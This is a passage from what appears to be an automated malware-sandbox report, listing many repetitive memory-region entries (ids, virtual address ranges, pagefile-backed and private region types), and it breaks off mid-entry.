0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12947 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12948 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12949 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12950 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12951 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12952 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12953 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12954 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12955 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12956 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12957 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12972 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 12973 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 12974 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 12975 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 12976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12985 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12992 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12993 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12994 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12995 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12996 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 12999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13004 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13005 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13040 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13041 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13048 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13054 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13143 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13144 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13145 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13146 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13147 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13148 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13149 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13150 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13151 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13152 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13153 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13154 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13155 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13156 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13157 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13158 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13159 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13160 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13161 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13162 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13163 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13164 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13165 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13166 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13167 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13168 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13169 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13170 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13171 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13172 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13173 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13174 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13175 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13176 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13177 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13178 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13190 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13200 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13201 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13202 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13203 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13212 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13213 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13214 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13215 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13216 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13217 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13218 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13220 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13221 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13222 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13233 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13234 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13235 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13259 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13260 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13261 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13262 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13263 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13383 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13384 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13385 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13386 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13387 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13388 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13389 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13390 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13391 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13392 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13393 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13394 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13395 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13396 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13397 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13398 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = 